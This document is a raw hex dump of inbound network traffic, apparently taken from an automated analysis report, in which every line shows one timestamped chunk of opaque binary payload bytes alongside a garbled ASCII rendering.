2023-01-03 15:29:20 UTC	307	IN	Data Raw: f8 2a 0f 52 39 9c cb e5 0a 1b da 10 b4 92 82 01 1d fa 14 39 be c1 62 5e b0 90 9f 52 87 da 37 da 15 54 67 d6 60 68 c4 04 5b 66 99 ee 3d e8 9b f2 cd 93 35 b4 ba 3a ad 3a dc 01 97 3f 55 33 ba ba 9a 68 75 57 44 aa 7b a1 5f af ce 2e c7 73 7b 2c 65 62 78 21 9f ee f5 c7 d4 f8 ee 05 6b 64 0b 1f 6e ce 60 b5 8a 73 04 81 dd 84 d5 b4 25 87 e3 13 03 b9 96 3c 94 ea 1f f4 04 f2 8c 3e 8b 9b 34 ff 28 c2 fd 78 65 14 89 72 17 cb 1f 64 7d 18 28 8a 58 28 3c 00 94 25 cf 48 0f 6a 1e f9 11 bd 0f b2 38 09 f7 23 a6 7e ba c0 69 e0 af 54 af 43 1b 88 73 9d e4 2d 51 87 78 1a de 61 41 71 c2 ee d5 b0 5a 9d bc 9d de f3 54 f6 6c 40 b1 fa 99 d3 a3 36 f1 7e f3 6c 44 a6 ee 1c 80 8f c8 2d f2 01 d8 05 e7 4c e2 ad 08 75 8e 5d 08 eb 40 8f 8d 02 fd 33 0a 74 99 06 74 54 2a 7c 58 e8 d7 d1 d2 48 d1 Data Ascii: R99b^R7Tg`h[f=5::?U3huWD{_.s{,ebx!kdn`s%<>4(xerd}(X(<%Hj8#~iTCs-QxaAqZTl@6~lD-Lu]@3ttT\|XH
2023-01-03 15:29:20 UTC	316	IN	Data Raw: e8 18 52 e2 e5 62 ab 1a 63 a7 a3 18 7d 56 fb 0c e4 49 e0 0e 5f c3 8d 8f 1c 2e 56 e7 d5 c0 f2 4b 7e 31 88 56 93 85 31 30 ac 7b 91 c2 a1 9b f4 d6 a2 22 af b3 55 d8 26 0b f6 ae b8 56 64 0f a6 76 01 87 5b 12 46 72 97 3e c0 ee 77 b7 e5 88 61 d3 36 9b 18 36 0b 57 e1 d7 a9 4a 7a 17 5d 96 bb 26 e2 39 48 e7 97 98 18 dd 4f 02 9f 08 85 17 97 92 99 83 b8 57 0b 2b 55 98 3c 6e 4b dd 72 43 47 a8 34 92 01 92 fb d2 7d 56 32 e7 4b 7a 45 a9 2c c5 54 50 c4 16 07 3b 52 28 ef b2 9f b8 db 4a b7 b8 e1 28 65 1c c7 ed 69 9e 45 49 6a a2 0b f9 cf ae 8a 3e a8 e9 95 01 ac a9 af 3c 86 7b 80 1d a5 b8 30 1b 49 86 a7 94 b7 ab f3 e6 de 84 4a 6b 4b 51 83 3f ac c4 bd b9 63 7a 01 d4 92 2a 86 27 73 bf fc 80 7a 23 7d 87 4e bb 31 db ef e0 dd b0 cc 66 85 f8 eb 91 b0 5f 26 92 38 2a 13 c1 f9 77 a2 Data Ascii: Rbc}VI_.VK~1V10{"U&Vdv[Fr>wa66WJz]&9HOW+U<nKrCG4}V2KzE,TP;R(J(eiEIj><{0IJkKQ?cz'sz#}N1f_&8w
2023-01-03 15:29:20 UTC	332	IN	Data Raw: d9 a8 17 8c 62 2b 60 e9 a6 65 0f b1 69 31 6d ac 4c 04 bd 36 d3 2a 18 0d 62 a2 c5 34 59 b4 da 1c 42 f3 af d6 84 1a 0d fa 42 56 2b 8d d3 81 79 87 fa 88 34 1b 73 20 41 26 9d 49 4b a2 8d b9 6a 9d b3 08 b1 0c 6d 7a ab 34 76 59 b9 aa 35 7a 63 46 8e a0 ce 33 ea 34 b4 3e 30 ad 06 75 ae 56 da 56 12 d0 94 91 63 11 24 35 3c 5e 6c 93 d8 c4 75 b9 26 bd 16 4b 91 8a 20 d1 62 31 53 4f 68 23 30 42 4d d4 eb b5 59 6a bd 90 5e 08 c5 64 d1 ce b5 69 0d b4 51 f0 ba c7 72 b6 59 b4 4e 3b 86 94 44 e7 70 cf 54 e7 62 6b 43 6f 8b cd 04 ad 8f c7 09 a5 6e d0 b2 14 a9 f5 66 c8 57 21 8a 84 9a c9 a2 4d 8b be 87 cb 05 93 1a 8a c0 51 33 d0 a1 20 15 7a ad 46 1e 3e 9d 4b 95 b8 99 b5 99 36 4b 23 37 8b 96 b6 1b e8 2e 56 9d 81 49 14 d3 69 d6 d2 f7 9f 34 6d d9 46 e8 7b 36 03 a4 2a 23 5b ec 1f 50 Data Ascii: b+`ei1mL6b4YBBV+y4s A&IKjmz4vY5zcF34>0uVVc$5<^lu&K b1SOh#0BMYj^diQrYN;DpTbkConfW!MQ3 zF>K6K#7.VIi4mF{6#[P
2023-01-03 15:29:20 UTC	333	IN	Data Raw: 6d 2e ae 21 ac b0 02 35 e2 02 c3 aa a5 0b 60 74 c0 d1 16 c7 e8 41 c4 df ae a2 fd a0 87 5d 45 fb 45 20 b7 87 d9 55 b4 cc 15 76 15 6d 7f b1 1c 93 ed 2a 5a 27 1a ee 6f b2 ab 68 9f 2b e0 f6 45 1c 4b b9 bc 15 3c dc 1a 40 6c 57 95 dc df ba 88 8d 7b 9b c0 8e 59 dd ce f9 f7 d9 55 b4 af d7 d8 55 b4 9d 1e e5 78 82 bb 9f e1 f6 5a 8e 17 38 d6 f1 74 df e0 f6 db 9c ff 2e b7 93 e7 18 7a 3e c7 dc bd 39 fa 72 f4 7f 4e 45 db 59 00 b7 77 e1 d8 83 a3 c0 c3 07 72 7b 30 b7 87 70 7b 18 b7 0f e7 f6 91 1c 15 1c c3 b9 7f 34 c7 58 8e 71 1c 13 39 26 73 9c c1 71 16 4f 57 1a 47 0d 77 cf e6 a8 e7 68 7a 8e 95 eb 7c 8e 8b 9f 63 e5 59 fa 1c 2b 97 d5 80 f8 bb 86 b5 dc 5e f5 9c 8a 8e 69 47 9f 53 d1 71 e7 06 20 be 83 0a 28 61 f6 e1 25 cc 9e cc ed 56 c0 07 b1 3e 01 f1 ad c6 da 12 15 1d b7 4e Data Ascii: m.!5`tA]EE Uvm*Z'oh+EK<@lW{YUUxZ8t.z>9rNEYwr{0p{4Xq9&sqOWGwhz\|cY+^iGSq (a%V>N
2023-01-03 15:29:20 UTC	348	IN	Data Raw: c8 13 c6 a0 ce e4 4d 27 35 4f a7 cd 1f 3d 5a 62 09 4e 8d 82 51 2f 59 18 10 42 77 e9 a9 56 77 6d 0a d3 d4 a4 0e ee df 57 94 24 7a 1c cc f1 02 da 2c bd 31 5d ad 1f ec d0 3b 68 cd b0 de 08 a6 87 73 42 04 3d 0c ce 0e 75 07 5d 70 e9 0c 79 78 49 af 43 c5 47 19 51 a3 02 29 c5 53 3b d0 5b 6c f8 47 43 82 49 88 40 1e 25 b0 d1 0d 35 66 86 32 ad 04 1f fc 70 36 b2 58 35 30 f4 e2 55 f2 8a e4 10 21 61 1c 57 58 a4 4e c5 13 42 ff 3e 67 54 d2 fd 86 15 91 d1 e1 60 85 b1 1c 75 89 88 39 a9 b8 bc b0 a6 b2 65 16 0c 36 d8 f1 52 a9 5a 65 50 36 11 ef b1 c7 2e ed fc dd c1 64 22 b7 53 b4 b1 c1 98 24 a8 13 c8 44 43 26 5e 29 5c 48 42 1d 26 bc eb 1e 32 9a 2b 6a b3 27 13 dc a2 c2 da 50 13 9a 5e 18 aa 61 37 28 c3 0c 60 4b 85 11 30 13 c6 09 33 d1 ab d3 71 a9 e0 8e 2f 57 9b 6b 34 17 86 ea Data Ascii: M'5O=ZbNQ/YBwVwmW$z,1];hsB=u]pyxICGQ)S;[lGCI@%5f2p6X50U!aWXNB>gT`u9e6RZeP6.d"S$DC&^)\HB&2+j'P^a7(`K03q/Wk4
2023-01-03 15:29:20 UTC	364	IN	Data Raw: 70 03 ec 79 94 03 d8 b6 28 dc 0f 61 03 e2 5e 45 bb 5e 87 ee 18 7c 00 7a 37 f4 80 e3 64 14 d3 a8 7a a1 4d bd 98 76 68 2f 66 fd 4d 2f e6 04 cc c3 7a 31 3b c0 2e 41 9e ba 17 b3 01 76 c0 01 38 01 cd a5 bd 98 1e 30 00 36 c0 01 38 39 c6 21 9d 88 72 49 d0 03 fa 09 b0 01 7a 2d b4 80 19 70 00 2e 40 9d 05 3f 80 19 b0 03 b6 6c d8 72 a0 07 34 93 a1 c9 47 99 42 e4 03 71 45 28 37 0d 79 d3 7b 31 37 47 09 ea 28 85 5f a0 13 60 65 d0 01 9d 80 b5 1e c7 d2 00 7f 40 dc 3c 94 01 ac 26 c4 80 0b b0 36 42 d7 04 df 66 d8 00 4d 0b ea 6f 85 ff 36 d8 01 db 02 f8 5b 0a dd 1f a0 71 22 06 9c db 60 db 0f bf 80 e6 00 ea 05 ac 87 50 e6 13 d8 8e 20 fe 02 f9 5f 42 0f d8 be 82 cd 0d 0d d0 79 02 be 4f a2 cc d7 a8 1b b0 9e 82 5d fa bc a2 39 83 fc c1 d1 cc fc 9b 68 f4 7b 34 b3 03 0e a0 13 70 03 Data Ascii: py(a^E^\|z7dzMvh/fM/z1;.Av80689!rIz-p.@?lr4GBqE(7y{17G(_`e@<&6BfMo6[q"`P _ByO]9h{4p
2023-01-03 15:29:20 UTC	365	IN	Data Raw: 14 db c8 d8 5b 52 9a 2f 01 5f 5c 25 ec 68 0d eb db c4 5a ce be 91 52 d2 32 06 ac 8f 4a d8 1b db a8 6f 16 56 15 66 17 a8 c4 65 20 b3 71 c8 0d 7c 0d 08 e9 f7 e1 63 55 b9 4d 54 37 5e 95 cb 63 7f 19 9b 09 7b 5b a3 78 94 c2 22 12 c6 16 b4 61 ae 2a b7 bd a1 55 5a cd 81 55 0b 29 4f 0b 6a 91 32 e3 10 73 9b 16 34 58 9a 9b f8 6f e8 c5 23 44 c1 45 2a be 12 9a d0 0b ec 26 81 4f e6 bb 74 f0 43 11 fa d3 26 d8 f8 e2 c7 e2 d1 ad 56 4d 36 b5 88 4b 47 30 3b e7 9e f3 c3 d6 f0 54 89 27 f5 30 52 6d 2d f5 bc 90 b8 7a 40 0b 63 8f ab c4 a5 70 a5 b5 28 f0 00 b3 5e c5 57 bd 08 d4 ae a7 84 1c 69 a1 73 e6 a0 a9 ac a6 1a 7a 74 1b 55 68 42 56 b6 9e b1 d7 38 cb d6 0b bb 51 ef 13 78 73 63 23 8e 5b d7 d0 84 ca 3e f2 b3 94 b3 43 92 c5 cc b7 a4 e6 eb f0 0a 47 cc c2 04 ab b0 15 7d 31 ff 61 Data Ascii: [R/_\%hZR2JoVfe q\|cUMT7^c{[x"aUZU)Oj2s4Xo#DE&OtC&VM6KG0;T'0Rm-z@cp(^WisztUhBV8Qxsc#[>CG}1a
2023-01-03 15:29:20 UTC	369	IN	Data Raw: ff 18 ee 3c c0 fd 4f ed f7 ac ee 9f ef 1f fc f3 ad 2c 26 26 86 fd 5f 84 b8 a0 41 cc 57 07 0d ec 57 11 aa e6 56 d7 18 6b eb ea 1b e6 cd 37 35 36 35 9b af b7 b4 b4 b6 2d 58 d8 be e8 06 31 3f 6b 52 76 4e ee e4 bc fc 82 c2 22 5d f1 94 a9 fa 69 d3 4b 4a cb 66 94 cf bc 76 16 fb 55 85 ff f4 71 f0 eb 18 0e aa b0 08 e1 16 b0 16 33 a1 e1 96 45 b7 5c 2a d9 1f 39 28 c6 6b fe 22 c6 37 3f d8 29 6c a0 a1 5d 62 15 e2 75 d0 6f 7b 78 df c3 c1 4e e6 cd 3f 89 b1 56 8a 9f 3b 47 7d 96 14 6f 84 fe 9d 87 0e 3f 34 84 7d fa 50 d7 43 d7 05 d5 6b 97 ac 11 18 5f 3a 6d da be 39 fb d4 ac 72 df bc 7d 09 dd f5 bb f6 1e e8 fc 8e b1 b1 4b c4 92 fc 3e e8 79 f6 a1 cf 40 c1 9e 87 34 31 ba 5f 34 ed 09 fc be e0 09 f9 b5 85 6c 47 5d 21 b3 df 57 c8 82 05 73 6f 1d d3 47 e8 58 b6 5f 5b db 56 ca cf Data Ascii: <O,&&_AWWVk7565-X1?kRvN"]iKJfvUq3E\*9(k"7?)l]buo{xN?V;G}o?4}PCk_:m9r}K>y@41_4lG]!WsoGX_[V
2023-01-03 15:29:20 UTC	385	IN	Data Raw: e5 ca 72 35 d9 0b c6 62 26 90 46 2b 55 bf aa e2 e7 5d 52 8f d5 e6 1a d2 68 8d d7 64 cd 60 63 81 7b ea 1a 51 48 f8 92 c6 14 4b 4f 65 3e 72 4f f9 67 82 7e af 71 43 25 18 5c 33 42 99 af ec 05 a2 aa 06 29 d1 49 a5 54 41 75 03 b6 f2 56 07 a9 43 e1 55 63 d5 a5 ea 01 f5 3a f8 d6 27 d5 1a 5f a9 da 09 98 35 40 0b d1 c2 b5 05 da 1a 6d b7 76 56 7b 01 8c 61 61 08 c5 b9 a8 0e 6a 0e 9d eb 86 3a 03 b9 f7 41 03 d1 2c b4 0b dd 85 ae 7d 83 ef e8 ad 82 2b d9 81 68 4c 0c 20 46 11 21 44 18 11 4f 24 02 87 e9 d7 34 8d 85 dc 74 9f 7a 4a 79 d2 b3 80 c9 5b 31 bd 81 15 a6 80 93 cc 60 67 b3 f3 d8 4d 6c 5f c9 15 e6 d2 5d f1 50 3c 81 0e bd 15 1f 45 d3 0c c8 02 ef 27 f4 a3 52 81 f1 45 a8 e7 a1 2c e2 5b 8b ed c4 8e 50 75 dd c5 5e 62 5f 71 80 78 46 ea 8b fd df 02 5f 27 98 c4 ad e2 0f 8a Data Ascii: r5b&F+U]Rhd`c{QHKOe>rOg~qC%\3B)ITAuVCUc:'_5@mvV{aaj:A,}+hL F!DO$4tzJy[1`gMl_]P<E'RE,[Pu^b_qxF_'
2023-01-03 15:29:20 UTC	386	IN	Data Raw: 99 9c b3 78 40 bc 2c de 10 fd a5 91 ea 69 95 d2 f4 e7 57 0c d1 66 e9 bf eb 50 1e af 8f 38 01 2f 1c 40 39 a8 35 a4 e3 db 84 0d 69 47 3a 90 4e 24 22 79 d2 95 ec 49 fa 91 63 c8 89 e4 74 48 5a 4b c8 55 e4 7a 72 1b 99 41 be 21 45 6a 10 56 1d 0f fa 13 9d cc 54 83 51 7b cf 3a 03 d7 54 e1 bb f3 9c 20 0b ad 84 76 e0 68 9c e8 2a 26 42 4d 1f 17 5f 88 55 a5 f9 52 1c 24 f8 75 90 f3 ae e0 9d bc 52 65 b8 6a 40 e5 f1 35 ab 57 a0 0a bf c3 68 45 10 b7 28 63 66 17 5b 95 5f c7 1f e7 9f f2 33 85 45 e2 6c c9 54 a9 08 fc c0 29 ee f8 de ab f1 d0 07 07 20 1f 16 2a 6f 15 23 b5 1c f0 81 a4 76 05 ea 35 b8 96 c7 bc 5e 9f 44 54 31 a5 d1 5d e8 96 cc 6d b6 9e 7e 67 2f 74 40 79 b9 11 54 4b 0f 60 29 5f c8 82 4b 64 fd 89 07 a3 94 79 98 3c 1a 01 5f 74 d4 ba 69 eb 35 83 67 79 43 36 be 2f d0 Data Ascii: x@,iWfP8/@95iG:N$"yIctHZKUzrA!EjVTQ{:T vh&BM_UR$uRej@5WhE(cf[_3ElT) o#v5^DT1]m~g/t@yTK`)_Kdy<_ti5gyC6/
2023-01-03 15:29:20 UTC	386	IN	Data Raw: de 37 d0 f8 b6 a0 08 5d c1 25 fa f3 41 7c 04 bf 93 bf cd d7 11 36 08 97 41 4f 3b 8b 71 90 e4 b6 89 87 40 f9 af 8a fa 7a 75 6f 69 b8 b4 45 ba 08 6a 45 02 cf 44 40 5a 7a a5 bc c7 f7 eb 55 57 55 f5 20 f6 a0 f2 f8 b9 03 f5 60 ac 66 a3 34 74 05 74 b1 08 dd 22 0a 88 d7 44 03 d2 17 df 05 b7 90 dc 45 1e 07 ce 6f 45 b5 a7 5a 40 75 f5 a4 03 e9 48 9c 9d d6 d1 53 b9 d5 5c b8 2e c6 e1 e5 71 06 8a 26 ce 11 d7 89 1c 32 02 88 f2 1d 9d c4 dc 80 1c dc 90 35 e6 2a 41 0a 98 ce f9 03 c9 b5 94 5c 21 39 fa 4b 13 a4 68 69 a5 94 2a 1d 85 6c fe 00 fc 48 94 b7 28 3b 95 83 ca 71 e5 0c a4 10 37 b5 97 1a 00 fa b6 51 f7 d1 d8 f2 d8 0b ef 30 03 d8 ad ec 0c ee 19 57 95 57 f8 c1 fc 24 7e 05 5f 1b 34 3f 45 78 2b d4 15 5f 89 26 b2 87 3c 10 af 7f 96 1d 4b 27 f4 08 d5 83 19 6f 05 9c df 0e f7 Data Ascii: 7]%A\|6AO;q@zuoiEjED@ZzUWU `f4tt"DEoEZ@uHS\.q&25A\!9KhilH(;q7Q0WW$~_4?Ex+_&<K'o
2023-01-03 15:29:20 UTC	402	IN	Data Raw: 58 75 f2 6b 27 56 1e 28 fb b8 f0 96 ab 5e 6c be aa 28 7e d8 bd 27 0f 76 cd 2a 3b dc 7e 48 ef a0 b4 7e 39 75 3a e7 7e f5 dd f3 af b4 a9 b8 e9 4f f5 e3 8e f7 ef 5b f3 fc f2 f7 96 4d 79 f9 2f fb 3a d7 ad 3c c4 c3 f7 3f 33 fa a1 b2 61 39 df 96 dd 7e cf aa 8a 9e 57 fe 2f 35 7f 1d 15 57 f0 2d fa 83 38 8d 37 ee d2 b8 bb 3b 8d bb 05 77 0b ee ee d6 1d dc 82 07 77 08 10 20 b8 bb 86 e0 16 82 43 02 04 77 87 49 be f7 be fb 9b 37 6b 66 d6 ac b7 e6 8f 99 6a ce e9 3e 52 b5 a5 f6 ae aa c3 59 eb 53 0c 26 3f af 48 ec 62 37 7e 0c 44 78 d2 ab a7 1f 37 5d 69 71 ee 3c 41 13 b8 fa 19 a7 36 ca 20 68 85 06 d5 b8 78 cb 80 79 7d e4 c0 77 83 41 c8 7b 51 58 79 9b 0a 2a 02 ae c9 46 9f 27 c5 68 2a 3c 8d 62 61 42 7f 38 39 66 fe 1d 2c 9f 63 a8 df 96 fa 53 03 12 7a db 26 95 fa e2 d8 10 5f Data Ascii: Xuk'V(^l(~'v;~H~9u:~O[My/:<?3a9~W/5W-87;ww CwI7kfj>RYS&?Hb7~Dx7]iq<A6 hxy}wA{QXyF'h*<baB89f,cSz&_
2023-01-03 15:29:20 UTC	403	IN	Data Raw: 41 20 85 34 30 c8 6e 2f de 33 ae 0d 28 be ff 01 f3 95 93 49 20 42 b9 8d 60 eb 65 ba 02 61 83 e6 fc 53 9f bc fc ba 2e 17 b4 73 88 8e 02 25 f2 c9 10 40 40 c7 84 30 af 73 ca 2a 95 ed 4e 81 4d 08 c7 8e 92 40 e7 db a2 ce 7e 2c 40 40 e0 13 70 4b c8 38 df d2 c4 81 05 ab 13 e2 24 89 7b 46 7c cd 7e e1 12 89 45 ae 0b 20 18 26 84 a3 f9 84 79 87 fa 70 55 ee 89 fa 52 03 93 f4 10 b4 57 a7 72 7a bc 76 d8 2e a2 f0 0e c9 57 bc 17 cd 79 7a 5f c4 f7 f4 f2 fd f9 d4 14 66 d0 e9 39 90 53 db bb b7 5f 4d 12 2b be 12 05 c1 4a 34 86 1a fb 07 36 ac 39 8e c9 b0 ef 58 db f9 16 46 04 ec 34 dc 48 1e 8e 87 92 b5 31 e6 9a c9 2a 8f 8b 87 e2 19 50 2d 49 a4 eb e1 7f 0f 34 ce e4 a4 78 6e 71 e6 95 25 dc f0 a4 66 62 4a c4 89 d6 a0 7a 86 5d 1a 69 63 40 6b ed 77 e8 39 36 35 21 f8 03 d5 df 6d eb Data Ascii: A 40n/3(I B`eaS.s%@@0sNM@~,@@pK8${F\|~E &ypURWrzv.Wyz_f9S_M+J469XF4H1P-I4xnq%fbJz]ic@kw965!m
2023-01-03 15:29:20 UTC	418	IN	Data Raw: f6 b8 0a 6e 20 f3 a9 a3 2e 1d 98 7e ff 02 75 f7 aa 5c ca 08 13 81 24 6e 52 11 e5 17 61 b6 b4 f8 5c 60 5f 3e 8b 37 fb 60 ac 51 b3 11 a2 8d 98 44 2c 09 1a d4 e7 88 fe 20 f7 f2 3d 9e a7 ca 58 32 24 48 6a c8 7c fe 3a df c8 f8 89 1e e7 52 42 6a 49 19 0a cf 41 dc 38 82 5b 49 b9 eb d5 5a 7c fa ca 5e 42 5d 5a 14 cc 5f 33 ea e0 8c d2 fa 66 22 0c 3c bf 45 ce 97 10 d0 4c 8c ec 5e 7a 6d 0c 3d b9 be b8 43 5e aa b5 05 12 8c bb 22 37 8d d0 9d 31 0c a3 b1 07 75 a5 46 b4 01 45 4b df ef a8 6a f7 7e fc 73 d2 bc 8b 0a fa 5e 9a ae 81 3d f7 b7 25 7b d0 d0 2a ce fd 8f d9 16 e3 73 27 5b df a3 f1 9f ed 26 2c 08 19 c3 1b ab f3 2f 34 21 11 64 07 fd 58 c9 0c 04 03 5f 1b 30 8d a5 7d a9 fc de 11 c0 89 ed 8a d1 17 76 da d7 48 ef 66 fd c3 ee ec b0 55 d7 53 97 8e 1a a0 6e 07 df ef 44 fb Data Ascii: n .~u\$nRa\`_>7`QD, =X2$Hj\|:RBjIA8[IZ\|^B]Z_3f"<EL^zm=C^"71uFEKj~s^=%{*s'[&,/4!dX_0}vHfUSnD
2023-01-03 15:29:20 UTC	434	IN	Data Raw: eb 65 88 3f 61 b4 13 c8 8d 21 b8 99 40 15 f0 eb e9 67 1b 36 01 3b a5 7d 02 cc 26 59 4a d3 00 00 f1 99 38 a8 9f 63 59 63 6b 49 64 1b 57 d7 9c 54 82 06 21 eb 87 99 4c 29 00 34 cf a4 ca b1 ff eb f2 25 78 61 68 02 4c d5 aa cb f2 15 28 27 f8 ec 04 da 22 92 e7 aa 4b b6 84 66 9f b5 11 3e 5f be a8 5a fd 6e 4d ae 1f 40 13 05 bb 79 9e f9 72 95 a1 35 2b 4f 4f 32 81 25 df 7e 67 ce 52 5b d8 80 92 d7 f6 ef 10 f3 49 ea 09 e8 45 eb b2 f1 e0 fa 18 1d a3 15 b0 c1 35 92 73 a8 84 3b 3a 25 16 6a fa b0 f3 ae 55 7b 49 17 11 f8 1f 85 15 b2 f3 e4 b2 d5 62 08 3f 5e 7d 1b ab ab 65 47 00 1a d9 e3 a9 02 64 ca e5 ed b6 8c 3b be 1b 56 a9 ba b2 94 ad 68 b9 5c 78 75 51 d5 15 72 25 d7 c3 11 ec d1 31 e3 a6 d4 83 39 d5 0f cc 35 e3 7e b5 11 a7 9a 54 ae 6d 22 d7 a2 57 c8 58 a3 15 c5 6b db fc Data Ascii: e?a!@g6;}&YJ8cYckIdWT!L)4%xahL('"Kf>_ZnM@yr5+OO2%~gR[IE5s;:%jU{Ib?^}eGd;Vh\xuQr%195~Tm"WXk
2023-01-03 15:29:20 UTC	435	IN	Data Raw: 4c 78 5c bd b8 cc cc d6 66 7e 46 8f c0 e8 f2 9f 97 20 b2 e9 8c 2f 90 3f 88 ce 46 dc ca ca 7a 38 0a b3 ec 0e c2 2b f6 2b c5 f2 42 ba c6 48 dd 89 94 a6 34 e4 a3 0e 53 fb 5b f6 77 ee 86 3a 82 f4 09 cf 06 a7 55 8a 24 82 b9 7b e3 0c b1 99 a7 85 c5 bf 06 7e fe db 00 e4 62 62 1d 5f 2d 44 1e 24 df b4 b1 fd 01 d4 23 3c 22 20 14 6b df f0 cb 40 01 f0 fd 01 56 08 55 c8 fe 29 f1 9f 76 a0 83 99 86 50 7c 9d 58 7d 2e f4 fc 42 15 61 c8 2c 21 b4 81 23 d0 f7 c1 d6 cd d4 61 59 5f 15 26 bb f8 b7 e6 06 82 7d dc 1e d0 2c fc 7f d2 ab e5 8f 93 82 d0 16 30 e3 10 b7 c6 31 40 76 38 f6 7c 8a bb 2a 80 03 96 da a5 6e 15 63 7a d3 50 33 54 a7 a8 3e c3 42 4a bb 72 a8 a2 d0 47 5e 1a b1 b2 33 3c dc 7f fe a6 23 1e 7d 5b 03 b9 e2 25 7e 9b f3 03 94 9d c4 7c 7d 84 de 15 b0 c7 fe 46 5f 03 d1 85 Data Ascii: Lx\f~F /?Fz8++BH4S[w:U${~bb_-D$#<" k@VU)vP\|X}.Ba,!#aY_&},01@v8\|*nczP3T>BJrG^3<#}[%~\|}F_
2023-01-03 15:29:20 UTC	439	IN	Data Raw: d8 5a c0 8a 0c a6 10 2c 8e b0 9b 0d 4b 4a 44 0b a4 ba a9 10 ea 30 7c 9c 60 6f 45 1e b5 b7 4f 25 6b 05 f6 84 6f a1 b3 86 75 a8 48 2b a2 ab 5b de 4c e1 19 38 e3 b3 61 2d b1 80 31 ba 5e fb ed ee 68 ca 7c e8 ca f9 ad 83 fb dd 68 f1 bc e5 89 61 a6 e2 a7 2a 20 8f 16 87 4b 92 3c be 5d b2 a6 c8 6f 6b 5e 10 db 08 07 ca d0 90 47 78 55 b4 e4 b4 cc cd d5 26 1b 01 85 e2 01 e9 5d ac 56 a4 69 1f 17 52 19 b0 bc c8 33 43 bc 1f eb 93 04 08 33 83 9c 11 66 90 b9 c9 ba 11 58 32 79 b1 58 c9 83 aa 04 39 7f 0c b2 d9 9a 39 56 c1 4e 73 b6 b6 b6 b0 f0 bf 58 82 50 01 74 27 6d d9 fd 0a 52 cb 57 b0 1a 79 05 c7 29 14 2b fa 6f 96 eb 80 fd 96 7d c8 83 70 a0 a2 07 95 45 ec a5 a1 bd 64 cb 23 1f 30 a9 ef 84 2b db b6 8f d4 3e 61 a4 b4 ac 2b e3 a5 2c 79 41 83 be e1 b2 23 19 24 33 6b 79 47 8d Data Ascii: Z,KJD0\|`oEO%kouH+[L8a-1^h\|ha* K<]ok^GxU&]ViR3C3fX2yX99VNsXPt'mRWy)+o}pEd#0+>a+,yA#$3kyG
2023-01-03 15:29:20 UTC	448	IN	Data Raw: 26 e9 83 1a ad 70 b3 73 0b ec 3a a9 92 cc f5 71 54 dd dc 7c 79 7b ba 79 74 28 e9 09 55 c3 8b 40 e5 23 4b 5c 75 fb 79 1d 6d 9d 20 27 55 6d 40 e1 5b 22 a9 90 bf f2 9f 35 be ee bb 52 ac 6b 52 9e 6e af 18 fd 34 44 16 ab 04 bf 6b b1 3a 7b 47 94 4f 98 ae 8b 95 ca 88 96 e6 36 d5 22 c3 12 9a fa 22 d0 54 a3 37 c5 5f 53 df 96 2e 25 5f 64 19 08 68 3f d9 ea b8 4f ef 53 19 f5 b3 24 08 70 c2 34 0b a1 b5 96 5f 3b 40 ba 2b f1 af 7c ff fc 21 fb e7 03 4f 57 57 92 39 97 fa 21 66 fa ae 07 0b b5 4b 0f 88 39 fc 8b 1e fc a0 13 43 6d d7 66 fd 54 f8 99 6e 60 6a cd 98 42 48 5e e9 34 ad e7 5e bc 20 8a 81 23 4f a4 25 78 0a 50 fa a2 8f 78 25 64 be f9 f5 aa 13 7c b1 53 fa 47 52 77 b6 e5 46 5c ce 91 78 3e b7 24 1d 0e 4d d5 ac a9 2f 14 a1 17 05 53 11 44 e2 b9 5d 7c d5 a4 21 14 b8 7e af Data Ascii: &ps:qT\|y{yt(U@#K\uym 'Um@["5RkRn4Dk:{GO6""T7_S.%_dh?OS$p4_;@+\|!OWW9!fK9CmfTn`jBH^4^ #O%xPx%d\|SGRwF\x>$M/SD]\|!~
2023-01-03 15:29:20 UTC	464	IN	Data Raw: bd d7 2c 1d 56 40 bd 86 9b 01 12 2e 67 45 23 9e 6c 5e 1b 79 a5 f4 0a ff 31 75 01 6b 09 d4 ce 97 bc 69 d2 bd bb 3d 4e 4a 64 73 01 49 2c 6a 6a 00 94 fc 10 a2 d8 18 bd f8 8e b9 f9 9c ec fa 4a 36 bb 3d 39 97 36 8d 69 95 3b 9f 39 11 3c b2 66 e3 16 01 92 6b 6b ad 63 ab 84 4a f5 fd dd 7c c5 66 45 b3 b1 46 12 5e 85 ff 5b b3 0d 0a 1f 8e be 7b 46 36 46 2b 19 7c 2c 4e 00 67 34 98 1c 92 c1 2a 9e 2a 31 ef 98 9c 17 4f f1 a7 34 04 4c 31 a9 7b 9f 33 cc 2e a5 4c fc 84 94 d9 16 ab 45 9c 78 41 59 19 91 a8 b1 30 27 be 20 d8 f9 56 ee 13 6f 86 1e 45 2c aa 18 38 f9 36 92 f5 84 85 83 16 6a e9 b1 a9 16 1d 19 d0 ee 27 b3 e5 e4 e4 54 c5 80 b8 9f cf f4 0e b0 16 78 96 c6 4a da 2c 48 19 6a b2 32 47 53 08 4e 61 a1 e1 06 7f 6b 21 e1 fe 5d 80 6e 9e eb d3 6a be 32 38 7a 2c 52 32 61 61 22 Data Ascii: ,V@.gE#l^y1uki=NJdsI,jjJ6=96i;9<fkkcJ\|fEF^[{F6F+\|,Ng4**1O4L1{3.LExAY0' VoE,86j'TxJ,Hj2GSNak!]nj28z,R2aa"
2023-01-03 15:29:20 UTC	465	IN	Data Raw: f1 ec 78 68 67 6f d7 4f 69 3d 15 d0 50 a6 7c 3b c7 ee 42 52 4e 04 88 85 2e 7c 7b e0 d4 cd ed fe 93 29 31 ac 84 a2 09 19 35 62 dc ae 04 6c b0 0b d0 a5 77 19 43 1a cd bd 44 5d 8c 30 e9 47 a5 46 9f 0f 0d 55 1c 1e 71 07 8b 27 f7 bb 55 cc 34 cb 28 4a 16 ad 2b 39 4d 72 a3 0e 31 77 b6 3b 10 d9 2b a9 5d e4 1e d8 77 33 7d 24 b5 24 ef 4e 04 c7 43 84 b7 90 c6 a7 2a 89 2a c8 01 b1 7f c1 83 10 e4 b0 cf c0 b4 8e 46 51 d7 71 ac a9 8a 0e 0d 25 89 1b 87 86 16 51 90 42 c2 41 2b 19 1a ab 42 26 35 41 c2 d4 10 17 3e 10 a1 eb 54 22 fb ad 57 77 d4 f8 c0 a9 e0 57 76 ca fd c2 e1 a6 16 37 fa ef f0 93 7c 26 3d 25 de 80 86 df 87 e8 2a d0 af 66 f4 19 03 8c 5f d8 cb d7 d0 8b be ac 3b 54 89 e3 4a 17 9f 38 ad 37 99 63 38 98 50 e2 93 86 c3 b4 62 53 0d 87 ca b1 45 b9 3a 01 75 1e 7b 95 11 Data Ascii: 